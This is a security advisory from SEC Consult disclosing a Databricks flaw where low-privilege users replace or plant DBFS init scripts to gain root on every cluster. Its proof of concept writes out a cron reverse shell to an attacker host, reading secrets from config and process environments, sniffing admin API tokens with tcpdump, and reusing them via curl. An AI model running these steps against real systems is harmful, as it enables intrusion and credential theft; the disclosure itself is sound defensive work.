Authored by Florian Roth, Marius Bartholdy | Site sec-consult.com

The Databricks Platform as of 2023-01-26 suffered from a cluster isolation bypass vulnerability through insecure defaults and shared storage.

SEC Consult Vulnerability Lab Security Advisory < 20230502-0 >
=======================================================================
               title: Bypassing cluster isolation through insecure defaults and
                      shared storage
             product: Databricks Platform
  vulnerable version: PaaS version as of 2023-01-26
       fixed version: Current PaaS version
          CVE number: -
              impact: critical
            homepage: https://www.databricks.com
               found: 2023-01-20
                  by: Florian Roth (Atos)
                      Marius Bartholdy (SEC Office Berlin)
                      SEC Consult Vulnerability Lab

An integrated part of SEC Consult.
SEC Consult is part of Eviden, an atos business
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Databricks Data Science & Engineering (sometimes called simply "Workspace")
is an analytics platform based on Apache Spark. It is integrated with Azure to
provide one-click setup, streamlined workflows, and an interactive workspace
that enables collaboration between data engineers, data scientists, and
machine learning engineers."

Source: https://learn.microsoft.com/en-us/azure/databricks/scenarios/what-is-azure-databricks-ws


Business recommendation:
------------------------
The vendor disabled legacy scripts and migrated cluster-scoped scripts from
DBFS to WSFS. Affected customers received migration instructions.

SEC Consult strongly recommends a thorough security review of the product,
conducted by security professionals, to identify and resolve potential further
security issues.

A blog post on this issue was written jointly by Elia Florio, Sr. Director of
Detection & Response at Databricks, and Florian Roth and Marius Bartholdy,
security researchers with SEC Consult. It can be found here:
https://r.sec-consult.com/databr

Furthermore, a proof of concept demo video has been published here (YouTube):
https://r.sec-consult.com/dbyoutube


Databricks concepts:
--------------------
Concept 1: Databricks File System (DBFS):

"The Databricks File System (DBFS) is a distributed file system mounted into a
Databricks workspace and available on Databricks clusters. DBFS is an
abstraction on top of scalable object storage that maps Unix-like filesystem
calls to native cloud storage API calls."

Source: https://docs.databricks.com/dbfs/index.html

Developers can therefore handle files as if they were local to a compute
cluster, although the files actually reside in cloud storage.

The recommended way to interact with the DBFS is from within a notebook by using
the Databricks Utilities (dbutils). The following command could be used to list
the content of a directory:
===============================================================================
display(dbutils.fs.ls("dbfs:/databricks/scripts"))
===============================================================================

For further information see: https://learn.microsoft.com/en-us/azure/databricks/dbfs/


Concept 2: Init Scripts:

Databricks uses a feature called "init script" to customize compute clusters.
They can be used to install dependencies or to configure advanced network
settings. These are shell scripts that run during the startup of each cluster.

There are different types of init scripts:

(I) Cluster-scoped init scripts only run on the specified cluster and have to be
set up by the cluster owner. Before a cluster-scoped script can be used, it has
to be uploaded to the DBFS. In the cluster configuration it is then referenced
by its file path, e.g. dbfs:/databricks/scripts/init-health-check.sh

(II) Global init scripts run on every cluster and have to be configured by an
administrative user. Their storage location is not disclosed.

(III) Legacy global init scripts are nominally deprecated. However, they are
enabled by default, even on newly created workspaces. The main difference from
the newer global init scripts is that they are stored on the DBFS in a fixed
location at dbfs:/databricks/init.

For further information see: https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts
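
The storage locations described above can be turned into a simple triage rule.
The following is a minimal sketch, not vendor tooling: the function name
classify_init_script and the three labels are hypothetical, and the only facts
it relies on are the ones stated in this advisory (legacy global init scripts
live under dbfs:/databricks/init, cluster-scoped scripts are referenced by a
DBFS path).

```python
from posixpath import normpath

LEGACY_GLOBAL_DIR = "dbfs:/databricks/init"  # fixed location named in this advisory


def classify_init_script(path: str) -> str:
    """Return a coarse, illustrative label for an init script path."""
    if not path.startswith("dbfs:/"):
        return "not-on-dbfs"
    # Normalise the part after the scheme so "dbfs:/databricks//init/x.sh" still matches.
    cleaned = "dbfs:" + normpath(path[len("dbfs:"):])
    if cleaned == LEGACY_GLOBAL_DIR or cleaned.startswith(LEGACY_GLOBAL_DIR + "/"):
        return "legacy-global"
    return "dbfs-hosted"


for candidate in (
    "dbfs:/databricks/init/global-init.sh",
    "dbfs:/databricks/scripts/init-health-check.sh",
):
    print(candidate, "->", classify_init_script(candidate))
```

Both DBFS labels mark scripts that any workspace user could reach under the
conditions described in this advisory.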


Vulnerability overview/description:
-----------------------------------
1) Bypassing cluster isolation through insecure defaults and shared storage

A low-privilege user is able to break the isolation between Databricks compute
clusters and take over any cluster in a workspace as long as they are allowed
to run notebooks. Due to an insecure default configuration combined with
insufficient access control, it is possible to gain remote code execution on all
clusters of a workspace. With such access, it is possible to leak secrets and
to escalate privileges to those of a workspace administrator.


Attack scenario:
The DBFS is accessible by every user in a Databricks workspace. All files stored
here are visible to anyone in the workspace. Cluster-scoped and legacy global
init scripts are stored here.

An authenticated attacker with the lowest possible permissions in a Databricks
workspace could run a notebook to:

1. Find and modify an existing cluster-scoped init script.
2. Place a new script in the default location for legacy global init scripts.

Both attacks lead to the takeover of the compute cluster resources and enable
further attacks. First, any stored secrets can be read. Second, workspace
administrator tokens can be stolen, as demonstrated by Joosua Santasalo from
Secureworks.

See: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html


Proof of concept:
-----------------
1) Bypassing cluster isolation through insecure defaults and shared storage
a) Preparations:

For this POC a new Azure Databricks workspace was created with the "premium"
pricing tier. It includes an administrative user (databricks-workspace-admin)
as well as a newly added low-privileged user (databricks-user) with the default
permissions "Workspace access" and "Databricks SQL access". These are the fewest
possible permissions a user can have.

To demonstrate both attack scenarios, three clusters were created:

1. Cluster on which the databricks-user has permissions to run notebooks
("Can attach to")
2. Cluster for the databricks-workspace-admin with a cluster-scoped init script
already configured.
3. Cluster for the databricks-workspace-admin with NO init script

The databricks-user does not have access to clusters 2 and 3 and cannot even
see them in the portal.

For cluster 2 (with a pre-configured init script), the following notebook
code was used by the databricks-workspace-admin to create an init script which
simply writes example output to /tmp/init-health-check-success.txt:

===============================================================================
dbutils.fs.mkdirs("dbfs:/databricks/scripts/")
dbutils.fs.put("/databricks/scripts/init-health-check.sh","""
#!/bin/bash
echo 'Init health check: successful' > /tmp/init-health-check-success.txt """, True)
display(dbutils.fs.ls("dbfs:/databricks/scripts/init-health-check.sh"))
===============================================================================

After that the script was applied to cluster 2 as a cluster-scoped init script.
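
Note that the notebook code above passes both dbfs:/... and scheme-less /...
paths to dbutils.fs. dbutils.fs is understood to resolve a scheme-less absolute
path against the DBFS root, so both spellings address the same file. The
following minimal sketch makes that mapping explicit; the helper name
to_dbfs_uri is hypothetical and the resolution rule is an assumption based on
the Databricks documentation, not something tested for this advisory.

```python
def to_dbfs_uri(path: str) -> str:
    """Return `path` with an explicit dbfs:/ scheme (illustrative helper)."""
    if path.startswith("dbfs:/"):
        return path
    if path.startswith("/"):
        # Assumption: a scheme-less absolute path refers to the DBFS root.
        return "dbfs:" + path
    raise ValueError(f"expected an absolute or dbfs:/ path, got {path!r}")


print(to_dbfs_uri("/databricks/scripts/init-health-check.sh"))
```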

To show the impact of this attack in a more tangible way, a keyvault-backed
secret scope as well as a databricks-backed secret scope were also created.
Their secrets were then used in the Spark configuration and in the environment
variables of clusters 2 and 3.

===============================================================================
Spark configuration:
databricks-backed-secret {{secrets/databricks-backed-secret-scope/databricks-backed-secret}}
azure-keyvault-backed-secret {{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret}}

Environment variables:
databricks_backed_secret_in_environment={{secrets/databricks-backed-secret-scope/databricks-backed-secret-in-environment}}
azure_keyvault_backed_secret_in_environment={{secrets/key-vault-backed-secret-scope/azure-keyvault-backed-secret-in-environment}}
===============================================================================

These serve only as examples. On a real production compute cluster they could be used to
connect to additional cloud storage as described here:
https://learn.microsoft.com/en-us/azure/databricks/external-data/azure-storage#--access-azure-data-lake-storage-gen2-or-blob-storage-using-oauth-20-with-an-azure-service-principal


b) Attack via pre-existing init script:

The attacker starts by viewing the content of the DBFS with the following code:
===============================================================================
display(dbutils.fs.ls("dbfs:/databricks"))
display(dbutils.fs.ls("dbfs:/databricks/scripts"))
===============================================================================

Any .sh file found could be a cluster-scoped init script applied to a cluster
that the attacker is not aware of. It is not possible to overwrite existing
scripts; they can, however, be renamed or deleted. The cluster configuration
only references the script by its path. Therefore, a newly created script with
the same name will be executed instead. Such a malicious file was created. It
includes a reverse shell that will continually attempt to connect to the
attacker's server.

===============================================================================
# rename file
dbutils.fs.mv("/databricks/scripts/init-health-check.sh",
"/databricks/scripts/init-health-check.sh.old")
#write new file with malicious content
dbutils.fs.put("/databricks/scripts/init-health-check.sh","""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)
===============================================================================

As soon as the init script is triggered again, for example via a cluster restart,
a reverse shell connection, with root privileges on the compute cluster, is
received:

===============================================================================
user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 48518 received!
bash: cannot set terminal process group (21384): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-110521-h6l5h1n2-10-139-64-5:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-110521-h6l5h1n2-10-139-64-5:~# uname -a
uname -a
Linux 0121-110521-h6l5h1n2-10-139-64-5 5.4.0-1090-azure #95~18.04.1-Ubuntu SMP Sun Aug 14 20:09:27 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-110521-h6l5h1n2-10-139-64-5:~#
===============================================================================
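
Because the cluster configuration refers to the init script only by its path, a
rename followed by a re-creation leaves the reference valid while the content
changes. The following is a minimal local sketch of that effect and of one
possible way to detect it, by comparing against a SHA-256 digest recorded when
the script was reviewed. It uses a temporary directory in place of DBFS; the
helper sha256_of and the file contents are hypothetical.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hex SHA-256 digest of a file's bytes."""
    return hashlib.sha256(path.read_bytes()).hexdigest()


with tempfile.TemporaryDirectory() as tmp:
    script = Path(tmp) / "init-health-check.sh"
    script.write_text("#!/bin/bash\necho ok\n")
    reviewed_digest = sha256_of(script)  # recorded when the script was approved

    # Same steps as in the PoC: move the original aside, then create a new
    # file under the old name.
    script.rename(script.with_name(script.name + ".old"))
    script.write_text("#!/bin/bash\necho replaced\n")

    # The path is unchanged, so a path-only reference still resolves ...
    path_still_resolves = script.exists()
    # ... but the digest no longer matches what was reviewed.
    tampered = sha256_of(script) != reviewed_digest

print("path still resolves:", path_still_resolves)
print("content changed:", tampered)
```

A check of this kind only helps if the recorded digest is stored somewhere the
low-privileged user cannot write to.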


c) Attack via legacy global init script:

Legacy global init scripts are enabled by default. An attacker can therefore
assume the feature is turned on and place a script in the default location at
dbfs:/databricks/init.

===============================================================================
dbutils.fs.mkdirs("dbfs:/databricks/init/")
dbutils.fs.put("dbfs:/databricks/init/global-init.sh","""
#!/bin/bash
crontab -l > mycron
echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACKER/8091 0>&1'" >> mycron
crontab mycron
rm mycron
""", True)
===============================================================================

Legacy global init scripts apply to every existing compute cluster. Every cluster
will establish a reverse shell as soon as its init scripts are triggered again.
This makes it possible to attack compute clusters even if they do not have
a cluster-scoped init script set up.

===============================================================================
user@$ATTACKER:~$ nc -lnkvp 8091
Listening on [0.0.0.0] (family 0, port 8091)
Connection from $TARGET 53910 received!
bash: cannot set terminal process group (988): Inappropriate ioctl for device
bash: no job control in this shell
root@0121-111747-cmijb28n-10-139-64-4:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@0121-111747-cmijb28n-10-139-64-4:~# uname -a
uname -a
Linux 0121-111747-cmijb28n-10-139-64-4 5.4.0-1100-azure #106~18.04.1-Ubuntu SMP Mon Dec 12 21:49:35 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@0121-111747-cmijb28n-10-139-64-4:~#
===============================================================================


Impact:

a) Leaking sensitive information in environment variables and the configuration:

Secrets configured in the keyvault-backed secret scope can only be retrieved at
runtime by the compute instance itself via a managed identity. Even Databricks
workspace administrators cannot read them directly. They are, however, available
to the compute cluster as soon as it is initialized. With remote code execution
and root privileges, an attacker is able to read the plaintext secrets of any
cluster.

Spark configuration secrets can be found at /tmp/custom-spark.conf:

===============================================================================
root@0121-111747-cmijb28n-10-139-64-4:/tmp# cat custom-spark.conf
cat custom-spark.conf
spark.databricks.unityCatalog.enforce.permissions false
spark.driver.host 10.139.64.6
spark.databricks.secret.envVar.keys.toRedact ZGF0YWJyaWNrc19iYWNrZWRfc2VjcmV0X2luX2Vudmlyb25tZW50,YXp1cmVfa2V5dmF1bHRfYmFja2VkX3NlY3JldF9pbl9lbnZpcm9ubWVudA==
spark.driver.tempDirectory /local_disk0/tmp
spark.databricks.delta.preview.enabled true
spark.databricks.wsfsPublicPreview true
databricks-backed-secret databricks-backed-secret-value <- THIS IS A SECRET
spark.databricks.secret.sparkConf.keys.toRedact ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA==
spark.databricks.mlflow.autologging.enabled true
spark.executor.tempDirectory /local_disk0/tmp
spark.databricks.enablePublicDbfsFuse false
spark.databricks.workspaceUrl adb-8690126810713062.2.azuredatabricks.net
spark.master local[*, 4]
azure-keyvault-backed-secret azure-keyvault-backed-secret-value <- THIS IS A SECRET
spark.databricks.cloudfetch.hasRegionSupport true
spark.databricks.unityCatalog.enabled true
spark.databricks.automl.serviceEnabled true
spark.databricks.cluster.profile singleNode
root@0121-111747-cmijb28n-10-139-64-4:/tmp#
===============================================================================
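
The two "keys.toRedact" entries in the output above look like comma-separated
Base64 strings. The following minimal sketch decodes them. Reading them as the
names of the keys that Databricks redacts is an inference from the property
names, not something confirmed by the vendor in this advisory.

```python
import base64

# Values copied verbatim from the custom-spark.conf output above.
REDACT_LISTS = {
    "spark.databricks.secret.envVar.keys.toRedact": (
        "ZGF0YWJyaWNrc19iYWNrZWRfc2VjcmV0X2luX2Vudmlyb25tZW50,"
        "YXp1cmVfa2V5dmF1bHRfYmFja2VkX3NlY3JldF9pbl9lbnZpcm9ubWVudA=="
    ),
    "spark.databricks.secret.sparkConf.keys.toRedact": (
        "ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0,"
        "YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA=="
    ),
}


def decode_key_list(value: str) -> list[str]:
    """Split a comma-separated list and Base64-decode each entry."""
    return [base64.b64decode(item).decode("utf-8") for item in value.split(",")]


decoded = {name: decode_key_list(value) for name, value in REDACT_LISTS.items()}
for name, keys in decoded.items():
    print(name, "->", keys)
```

The decoded values match the Spark configuration keys and environment variable
names configured in the preparation step, which tells an attacker exactly which
entries in the file and in the process environment hold secrets.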

In order to read secrets in the environment variables, an attacker would need
to access the environment of the right process. With root privileges, they are
able to access all processes' environments by reading the corresponding
/proc/<process-id>/environ file. For simplicity, the correct process ID (888)
was used directly in this POC:

===============================================================================
root@0121-110521-h6l5h1n2-10-139-64-5:~# cat /proc/888/environ
SHELL=/bin/bash[...]
TERM=xterm-256color
USER=root
SPARK_PUBLIC_DNS=10.139.64.6
azure_keyvault_backed_secret_in_environment=
azure-keyvault-backed-secret-in-envionment-value <- THIS IS A SECRET
SPARK_LOCAL_DIRS=/local_disk0SHLVL=1
MASTER=local[4]
SPARK_HOME=/databricks/spark
SPARK_LOCAL_IP=10.139.64.6
MLFLOW_CONDA_HOME=/databricks/conda
CLASSPATH=/databricks/spark/dbconf/jets3t/:/databricks/spark/dbconf/log4j/driver:/databricks/hive/conf:/databricks/spark/dbconf/hadoop:/databricks/jars/*
SPARK_CONF_DIR=/databricks/spark/conf
SPARK_DIST_CLASSPATH=/databricks/spark/dbconf/log4j/driver:/databricks/jars/*
PYENV_ROOT=/databricks/.pyenv
DATABRICKS_LIBS_NFS_ROOT_PATH=/local_disk0/.ephemeral_nfs
SPARK_ENV_LOADED=1
DATABRICKS_CLUSTER_LIBS_ROOT_DIR=cluster_libraries
PATH=/databricks/.pyenv/bin:/usr/local/nvidia/bin:/databricks/python3/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
DATABRICKS_LIBS_NFS_ROOT_DIR=.ephemeral_nfsSUDO_UID=0
DATABRICKS_CLUSTER_LIBS_PYTHON_ROOT_DIR=python
SPARK_SCALA_VERSION=2.12
MAIL=/var/mail/root
databricks_backed_secret_in_environment=
database-backed-secret-in-environment-value <- THIS IS A SECRET
SCALA_VERSION=2.10PTY_LIB_FOLDER=/usr/lib/libptyOLDPWD=/databricks/chauffeurSPARK_WORKE
===============================================================================
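
Entries in /proc/<process-id>/environ are separated by NUL bytes rather than
newlines, which is why some variables in the output above appear to run into
each other (for example "SPARK_LOCAL_DIRS=/local_disk0SHLVL=1"). The following
minimal sketch parses such a blob into a dictionary; the function name
parse_environ and the sample data are hypothetical.

```python
def parse_environ(raw: bytes) -> dict[str, str]:
    """Parse the NUL-separated KEY=VALUE records of a /proc/<pid>/environ blob."""
    env = {}
    for record in raw.split(b"\0"):
        if not record:
            continue  # a trailing NUL leaves an empty record
        key, sep, value = record.partition(b"=")
        if sep:  # ignore records without "="
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


# Hypothetical sample in the same shape as the output above.
sample = b"USER=root\0SPARK_HOME=/databricks/spark\0MASTER=local[4]\0"
parsed = parse_environ(sample)
print(parsed)
```

On a Linux host the same function can be applied to the bytes read from
/proc/self/environ to inspect the current process.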


b) API Token leak and privilege escalation:

Using a vulnerability initially found by Joosua Santasalo from Secureworks, it is
possible to leak Databricks API tokens of other users, including administrators.
The previously proposed hardening technique "Use cluster types that support user
isolation wherever possible." does not mitigate the initial vulnerability, as
all compute cluster types are affected by our new vulnerability.
Source: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html

It is thereby possible to impersonate any user and to gain privileges of a
workspace administrator.

Using the previously established reverse shell, it is possible to capture
control-plane traffic with the following command. As soon as the administrative
user starts a task, for example by running a simple notebook, the token
is sent unencrypted and can be captured.

(Make sure to verify that you are on the correct cluster when reproducing the
issue using the global init script attack vector since the user cluster will
also be attacked and send a shell too. This confused us more often than we
would like to admit.)

===============================================================================
root@0121-110521-h6l5h1n2-10-139-64-5:~# /usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
/usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked v1), capture size 262144 bytes
{"apiToken":"dkea****************************a107","procStartTime":53444,"commandOrigin":"PythonDriver","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/[email protected]"}
apiToken
{"apiToken":"dkea****************************a107","procStartTime":85732,"commandOrigin":"PythonWorker","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-
. . .
===============================================================================
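
The capture above mixes complete JSON objects, bare grep matches and truncated
payloads. As a minimal sketch of how such output could be post-processed, the
following keeps only lines that parse as JSON objects containing an "apiToken"
member. The function name token_records and the sample lines are hypothetical,
and the token value is a placeholder.

```python
import json


def token_records(lines):
    """Yield parsed JSON objects that carry an "apiToken" member; skip the rest."""
    for line in lines:
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated payloads do not parse and are skipped
        if isinstance(record, dict) and "apiToken" in record:
            yield record


# Hypothetical sample in the same shape as the capture above.
capture = [
    '{"apiToken":"PLACEHOLDER","procStartTime":53444,"commandOrigin":"PythonDriver"}',
    "apiToken",
    '{"apiToken":"PLACEHOLDER","procStartTime":85732,"commandOrigin":"PythonWor',
]
records = list(token_records(capture))
print([record["commandOrigin"] for record in records])
```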

This apiToken could then be used in the Databricks CLI or with the REST API
directly. The following example request requires administrative privileges to
succeed:

===============================================================================
└─$ curl -s https://adb-redacted.2.azuredatabricks.net/api/2.0/secrets/scopes/list -H 'Authorization: Bearer dkea****************************a107' | jq
{
"scopes": [
{
"name": "databricks-backed-secret-scope",
"backend_type": "DATABRICKS"
},
{
"name": "key-vault-backed-secret-scope",
"backend_type": "AZURE_KEYVAULT",
"keyvault_metadata": {
"resource_id": "/subscriptions/714984c7-3ed0-4de2-b23b-9cffd28b74f7/resourceGroups/rg-databricks-proof-of-concept/providers/Microsoft.KeyVault/vaults/redacted-databricks-poc",
"dns_name": "https://redacted-databricks-poc.vault.azure.net/"
}
}
]
}
===============================================================================

Additional scenarios are possible once RCE is achieved, for example by using the
managed identity of the compute clusters to get an access token via the instance
metadata service at http://169.254.169.254/metadata/identity/oauth2/token.
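
As a sketch of what such a request looks like, the following builds (but does
not send) a token request for the Azure Instance Metadata Service. The
api-version value, the "Metadata: true" header and the resource parameter are
taken from Microsoft's public documentation rather than from this advisory, the
chosen resource is only an example, and the function name
build_imds_token_request is hypothetical.

```python
from urllib.parse import urlencode
from urllib.request import Request

IMDS_TOKEN_ENDPOINT = "http://169.254.169.254/metadata/identity/oauth2/token"


def build_imds_token_request(resource: str) -> Request:
    """Build (without sending) a managed-identity token request for `resource`."""
    query = urlencode({"api-version": "2018-02-01", "resource": resource})
    # The metadata service expects the "Metadata: true" header on every request.
    return Request(f"{IMDS_TOKEN_ENDPOINT}?{query}", headers={"Metadata": "true"})


# Example resource (assumption): Azure Resource Manager.
request = build_imds_token_request("https://management.azure.com/")
print(request.get_method(), request.full_url)
```

Which resources such a token can actually reach depends on the role assignments
of the managed identity, which were not examined in this advisory.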


Vulnerable / tested versions:
-----------------------------
The latest Databricks PaaS offering was tested on Azure as well as Amazon Web
Services (AWS) with the "Premium" pricing tier as of 2023-01-26.


Vendor contact timeline:
------------------------
2023-01-26: Contacting vendor via PGP-encrypted email
2023-01-26: Vendor acknowledged the email and is reviewing the reports
2023-02-15: Vendor confirms all vulnerabilities and is working on a solution
2023-03-29: Vendor proposes a solution
2023-05-02: Coordinated release of security advisory


Solution:
---------
Databricks disabled the deprecated init script types for newly created
workspaces and added support for storing init scripts in workspace files.

The following solution for end users has been provided by the vendor:

Legacy global init scripts:

* Immediately disable legacy global init scripts (AWS [1] | Azure [2]) if not actively
used: it's a safe, easy, and immediate step to close this potential attack vector.

* Customers with legacy global init scripts deployed should first migrate legacy
scripts to the new global init script type (this notebook [3] can be used to automate
the migration work) and, after this migration step, proceed to disable the legacy
version as indicated in the previous step.

[1] https://docs.databricks.com/clusters/init-scripts.html#migrate-legacy-scripts
[2] https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts#migrate-legacy-scripts
[3] https://kb.databricks.com/legacy-global-init-script-migration-notebook


Cluster-named init scripts:

* Cluster-named init scripts are similarly affected by the issue and are also deprecated:
customers still using this type of init scripts should migrate them to cluster-scoped
scripts and make sure that the scripts are stored in the new workspace files storage
location (AWS [4] | Azure [5] | GCP [6]). This notebook [7] can be used to automate the migration work.


Cluster-scoped init scripts:

* Existing cluster-scoped init scripts stored on DBFS should be migrated to the alternative,
safer workspace files location (AWS [4] | Azure [5] | GCP [6]). Going forward, the default location of
cluster-scoped init scripts in the product UI will be workspace files.

[4] https://docs.databricks.com/files/workspace.html
[5] https://learn.microsoft.com/en-us/azure/databricks/files/workspace
[6] https://docs.gcp.databricks.com/files/workspace.html
[7] https://kb.databricks.com/cluster-named-init-script-migration-notebook
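
To find clusters that still need this migration, cluster definitions can be
scanned for init scripts stored on DBFS. The following is a minimal sketch under
stated assumptions: the layout of the init_scripts field (a list of objects
keyed by storage type, each with a destination) is modelled on the Databricks
Clusters API and should be verified against the current API reference, and the
function name dbfs_init_scripts and the sample cluster definitions are
hypothetical.

```python
def dbfs_init_scripts(cluster: dict) -> list[str]:
    """Return the DBFS destinations listed in a cluster definition's init_scripts."""
    found = []
    for entry in cluster.get("init_scripts", []):
        dbfs = entry.get("dbfs")
        if dbfs and "destination" in dbfs:
            found.append(dbfs["destination"])
    return found


# Hypothetical cluster definitions; the field layout is an assumption.
clusters = [
    {"cluster_name": "cluster-2",
     "init_scripts": [{"dbfs": {"destination": "dbfs:/databricks/scripts/init-health-check.sh"}}]},
    {"cluster_name": "cluster-3", "init_scripts": []},
    {"cluster_name": "migrated",
     "init_scripts": [{"workspace": {"destination": "/Users/admin/init-health-check.sh"}}]},
]

to_migrate = {}
for cluster in clusters:
    scripts = dbfs_init_scripts(cluster)
    if scripts:
        to_migrate[cluster["cluster_name"]] = scripts
print(to_migrate)
```

Note that such a scan does not cover legacy global init scripts, which apply
without being referenced in any cluster definition.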


Legacy global init scripts and cluster-named init scripts will be disabled for all workspaces
on Sept 1, 2023. They will not function after this date.


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part
of Eviden, an atos business. It ensures the continued knowledge gain of SEC
Consult in the field of network and application security to stay ahead of the
attacker. The SEC Consult Vulnerability Lab supports high-quality penetration
testing and the evaluation of new offensive and defensive technologies for our
customers. Hence our customers obtain the most current information about
vulnerabilities and valid recommendations about the risk profile of new
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested in working with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Florian Roth, Marius Bartholdy / @2023